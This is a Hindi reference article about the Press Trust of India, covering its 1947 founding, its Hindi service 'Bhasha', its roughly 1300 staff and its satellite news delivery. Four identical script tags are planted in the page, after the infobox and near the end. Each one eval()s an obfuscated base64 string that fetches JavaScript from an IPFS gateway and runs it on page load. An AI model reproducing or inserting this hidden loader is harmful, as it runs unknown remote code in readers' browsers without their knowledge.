प्रेस ट्रस्ट ऑफ़ इंडिया
प्रेस ट्रस्ट ऑफ़ इंडिया
| |
विवरण | 'प्रेस ट्रस्ट ऑफ़ इंडिया' भारत की सबसे बड़ी प्रमुख समाचार संस्था है। एशिया महाद्वीप के समाचार अभिकरणों में पहला स्थान रखती है। |
देश | भारत |
स्थापना | 27 अगस्त, 1947 |
शुरुआत | 1 फ़रवरी, 1949 |
विभाग | पीटीआई भाषा, पीटीआई फोटो, पीटीआई ग्राफिक्स |
कर्मचारी | 1300 लगभग |
अन्य जानकारी | पीटीआई के ग्राहकों में 500 समाचार पत्र व बीसीयों विदेशी समाचार समितियाँ शामिल हैं। संस्था अपनी स्वयं की उपग्रह डिलीवरी का प्रयोग करती है। |
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
प्रेस ट्रस्ट ऑफ़ इंडिया (पीटीआई) (अंग्रेज़ी: Press Trust of India or PTI) भारत की प्रमुख समाचार संस्था है। यह भारत का सबसे बड़ा अभिकरण है। देश भर में इसके 120 कार्यालय कार्य कर रहे हैं। यह संस्था कम्प्यूटर संगणक की सहायता से भी समाचार देती है।
इतिहास
प्रेस ट्रस्ट ऑफ़ इंडिया भारत की सबसे बड़ी समाचार संस्था है। इसकी स्थापना 27 अगस्त, 1947 को हुई थी, जबकि 1 फ़रवरी, 1949 से इसने कार्य करना शुरू किया। सन 1949 में भारत के प्रमुख समाचार पत्रों ने मिलकर 'एसोसिएशन प्रेस ऑफ़ इंडिया' को खरीद लिया, क्योंकि विदेशी शासन काल से काम कर रही ए.पी. आई न्यूज़ एजेंसी ब्रिटिश समाचार अभिकरण र्यूटर (reuter) की भारतीय शाखा मात्र थी। यह स्थिति स्वतंत्रता प्राप्ति के बाद तो समाप्त हो ही जानी थी और भारतीय समाचार पत्र भी इसे विदेशी पत्र के अभाव से मुक्त करना चाहते थे।
कार्य
- प्रेस ट्रस्ट ऑफ़ इंडिया एशिया महाद्वीप के समाचार अभिकरणों में पहला स्थान रखती है। देश भर में इसके 120 कार्यालय काम कर रहे है।
- 'रायटर युनाईटेड प्रेस इंटरनेशनल' (यूपीआई) और 'आजांस फ़्रांस प्रेस' (अएफ़पी) के साथ भी प्रेस ट्रस्ट ऑफ़ इंडिया की खबरों का लेन देन का समबन्ध है।
- पीटीआई हिन्दी समाचार सेवा भी चलती है, जिसे 'भाषा' कहते हैं। इस समाचार अभिकरण की फीचर सर्विस भी बड़ी लोकप्रिय है।
- टेली प्रिन्टर सर्विस के अलावा यह संस्था कम्प्यूटर संगणक की सहायता से भी समाचार देती है।
- पीटीआई के ग्राहकों में 500 समाचार पत्र व बीसीयों विदेशी समाचार समितियाँ शामिल हैं। संस्था अपनी स्वयं की उपग्रह डिलीवरी का प्रयोग करती है।
- इनसेट उपग्रह पर एक ट्रांसपोंडर के जरिये समाचार सीधे ग्राहक तक पहुँचाये जाते हैं। इंटरनेट के जरिये भी समाचार सीधे ग्राहक तक जाते हैं।
- करीब 1300 कर्मचारी, जिनमें 350 पत्रकार हैं, इस संस्था के लिए कार्य कर रहे हैं। देश में इसके लगभग 120 कार्यालय व विदेशों के प्रमुख शहरों में संवाददाता हैं।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>